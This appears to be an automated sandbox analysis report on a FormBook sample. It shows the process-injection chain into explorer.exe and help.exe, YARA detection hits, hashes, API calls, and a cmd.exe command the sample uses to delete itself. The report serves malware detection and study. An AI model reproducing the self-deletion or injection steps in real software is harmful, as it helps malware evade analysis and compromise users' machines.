                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: s6G3ZtvHZg.exe PID: 6076 Parent PID: 5760

                                                                  General

                                                                  Start time:10:02:28
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
                                                                  Imagebase:0x460000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: s6G3ZtvHZg.exe PID: 6328 Parent PID: 6076

                                                                  General

                                                                  Start time:10:02:34
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Imagebase:0x3f0000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: s6G3ZtvHZg.exe PID: 6336 Parent PID: 6076

                                                                  General

                                                                  Start time:10:02:35
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Imagebase:0xbc0000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: explorer.exe PID: 3292 Parent PID: 6336

                                                                  General

                                                                  Start time:10:02:38
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff662bf0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: help.exe PID: 7084 Parent PID: 3292

                                                                  General

                                                                  Start time:10:02:52
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\SysWOW64\help.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\help.exe
                                                                  Imagebase:0xbf0000
                                                                  File size:10240 bytes
                                                                  MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Chronological Activities

                                                                  Analysis Process: cmd.exe PID: 2888 Parent PID: 7084

                                                                  General

                                                                  Start time:10:02:57
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
                                                                  Imagebase:0x370000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 4456 Parent PID: 2888

                                                                  General

                                                                  Start time:10:02:57
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff774ee0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: s6G3ZtvHZg.exe PID: 6076 Parent PID: 5760 s6G3ZtvHZg.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00C8BBC8, Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: f23d4a964f92632e5415374b6ae9b00a5990f7df08fb27a717072e4015d93263
                                                                    • Instruction ID: 5ace2faa684f292655e80dca549568b5b956cded0fb21e6846e5c4e239254203
                                                                    • Opcode Fuzzy Hash: f23d4a964f92632e5415374b6ae9b00a5990f7df08fb27a717072e4015d93263
                                                                    • Instruction Fuzzy Hash: 8B712470A00B058FD724EF2AD15176AB7F1FF88308F00892DE59AD7A50DB75E9058B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8B1E5, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C8DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 7707973db5b3ae90583ce78884f0cc7b407882c1bfa0a45b89e46a7b6132705c
                                                                    • Instruction ID: d432b6e877653dcb8feed8a12c323b9df3129eb47ef0169a1403921aa2fe6300
                                                                    • Opcode Fuzzy Hash: 7707973db5b3ae90583ce78884f0cc7b407882c1bfa0a45b89e46a7b6132705c
                                                                    • Instruction Fuzzy Hash: 6D51DDB1D003099FDF14DFAAC884ADEBBB5FF48314F24812AE819AB250D7749985CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8B1EC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C8DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: bd0422de8e9941a0e68d13efb9422b98fb3cf0ea26d925e5c058ee7a9f4fc020
                                                                    • Instruction ID: d387c8f34c93730660a863b58c8feca4c2f63c0857abdbccb618a63ac2456c74
                                                                    • Opcode Fuzzy Hash: bd0422de8e9941a0e68d13efb9422b98fb3cf0ea26d925e5c058ee7a9f4fc020
                                                                    • Instruction Fuzzy Hash: B851CFB1D00309DFDF14DF9AD884ADEBBB5BF48314F24812AE819AB250D7749985CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C86D51, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 0448e5654d6716c176286e8c90737f6b8d8241020252bd64dc32cf048cd5edf4
                                                                    • Instruction ID: a67dd9b450b55b180efd53d1b0f7afafbb674b6ecdf46721a08613c7498002a4
                                                                    • Opcode Fuzzy Hash: 0448e5654d6716c176286e8c90737f6b8d8241020252bd64dc32cf048cd5edf4
                                                                    • Instruction Fuzzy Hash: D74139B6A002089FDF01CF99D844AEEBBF6FB48314F14806AEA54E7360C7359955DF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C85C6C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 29788571bf2ca100d493b45d703f5fa88513c717ff9f24f1c856ed6e5e820213
                                                                    • Instruction ID: daf4fd627eec1cd219f91e1a9df4b3e16fcf8727acbdc4d110bc8eb6d31b2a7a
                                                                    • Opcode Fuzzy Hash: 29788571bf2ca100d493b45d703f5fa88513c717ff9f24f1c856ed6e5e820213
                                                                    • Instruction Fuzzy Hash: 3D21E5B59002489FDB10CF99D884AEEBBF4EB48314F14801AE914A7310D374A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C86DC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 59f33a55e4115ac0de18ba7965afcfbc503b914cda1ff057a71ba59c4bb84bfa
                                                                    • Instruction ID: 1f5db595bc4028f4e48b2b0ed6606aa33bbaa6cd528309bf045b19bdefc788c8
                                                                    • Opcode Fuzzy Hash: 59f33a55e4115ac0de18ba7965afcfbc503b914cda1ff057a71ba59c4bb84bfa
                                                                    • Instruction Fuzzy Hash: 592114B5D00208DFCF00CFA9D584ADEBBF4FB48324F14801AE968A7210D374A955CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8B0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8BE89,00000800,00000000,00000000), ref: 00C8C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: d6b10c9287940c3bf2286e5ec09d5d72fe76b1a9e4cdb701fe81e7b369dea7a9
                                                                    • Instruction ID: 363f899ea7fc469bb573d853575a71b92c000d8966bf7032adae41bcf6fd2eab
                                                                    • Opcode Fuzzy Hash: d6b10c9287940c3bf2286e5ec09d5d72fe76b1a9e4cdb701fe81e7b369dea7a9
                                                                    • Instruction Fuzzy Hash: 0711F2B69002099BDB10DF9AD484BDEBBF4AB48358F14842AE929B7600C375A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8C028, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8BE89,00000800,00000000,00000000), ref: 00C8C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: ccb44d3f51b205a5b11cb7f1774f77329f72b0d2e236fca1d8de0738680ce78d
                                                                    • Instruction ID: a7fa5c2c16e7175baa921f19e3affd7a998e6c2793b4e2f831e735041b3565c4
                                                                    • Opcode Fuzzy Hash: ccb44d3f51b205a5b11cb7f1774f77329f72b0d2e236fca1d8de0738680ce78d
                                                                    • Instruction Fuzzy Hash: FB1103B6D00209CFCB10DF99D4847DEFBF4AB48354F14851ED529A7600C375A949CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8B05C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C8BBDB), ref: 00C8BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: a47c724d71f0dc5097cf7e0e22840e31340ad6e7222b908cb99fa481ae924795
                                                                    • Instruction ID: 622effa8ec248b68c05457759b7eb174fa7cbab70442963eee64853347f1a9b0
                                                                    • Opcode Fuzzy Hash: a47c724d71f0dc5097cf7e0e22840e31340ad6e7222b908cb99fa481ae924795
                                                                    • Instruction Fuzzy Hash: 861120B1C002498FCB10DF9AD444BDEBBF4EB88328F10842AD929A7610C374A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8B224, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C8DEA8,?,?,?,?), ref: 00C8DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 584e5af319d70ed80dbf84b7765a6862732456f2573823743edace37ac90cafc
                                                                    • Instruction ID: 727bea8cf422441014b8bb686c3c67c1ac077f0bb96cbdf4ad1c8ba74b0f6fe9
                                                                    • Opcode Fuzzy Hash: 584e5af319d70ed80dbf84b7765a6862732456f2573823743edace37ac90cafc
                                                                    • Instruction Fuzzy Hash: 6F1115B59043099FDB10DF99D485BEEBBF8EB48324F10841AE92AB7740C374A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00469272, Relevance: .4, Instructions: 366COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.250804572.0000000000462000.00000002.00020000.sdmp, Offset: 00460000, based on PE: true
                                                                    • Associated: 00000000.00000002.250794747.0000000000460000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.250913344.0000000000524000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12b78c96d0dd41f0e1f6d4216e41cee284de8fc453108d18cbe6ecf7714c416b
                                                                    • Instruction ID: 7202f40fce84d891eea5d4cde8672d5cc905b51b05bff743ded60c15f5898f66
                                                                    • Opcode Fuzzy Hash: 12b78c96d0dd41f0e1f6d4216e41cee284de8fc453108d18cbe6ecf7714c416b
                                                                    • Instruction Fuzzy Hash: A8D1F06251E3C12FC753873488652D17FB09F172A0B2E45EBE4C4CE0ABE5AD598AC726
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C8C508, Relevance: .2, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b886f788688d67dde79542f434058265e15e8759f8c760fe4b79bfb794fe34
                                                                    • Instruction ID: d1037f91e7946c2ce7f7563720a0ea49059fba4b1fa731f70332e58901c0d56c
                                                                    • Opcode Fuzzy Hash: 47b886f788688d67dde79542f434058265e15e8759f8c760fe4b79bfb794fe34
                                                                    • Instruction Fuzzy Hash: B7C106B189274ABAD710CF65F9B85897B61FBC5328F50420AD9612B7E0D7BC284BCF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: s6G3ZtvHZg.exe PID: 6336 Parent PID: 6076 s6G3ZtvHZg.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                    0x00418263
                                                                    0x0041826f
                                                                    0x00418277
                                                                    0x00418282
                                                                    0x0041829d
                                                                    0x004182a5
                                                                    0x004182a9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: B=A$B=A
                                                                    • API String ID: 2738559852-2767357659
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                    • Instruction ID: 1c387b76600627650b6819d79891315938da2532beacdf6eba0751ca60b83255
                                                                    • Opcode Fuzzy Hash: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                    • Instruction Fuzzy Hash: 189002B124500406D1507199C404B465005A7D4341F51C021E5054558EC6998DD576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                    • Instruction ID: 066afbbaee80f1cf2a7b946c4befa58c81678e0e9740d18e04cc144136699620
                                                                    • Opcode Fuzzy Hash: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                    • Instruction Fuzzy Hash: 629002A138500446D1107199C414F065005E7E5341F51C025E1054558DC659CC527166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

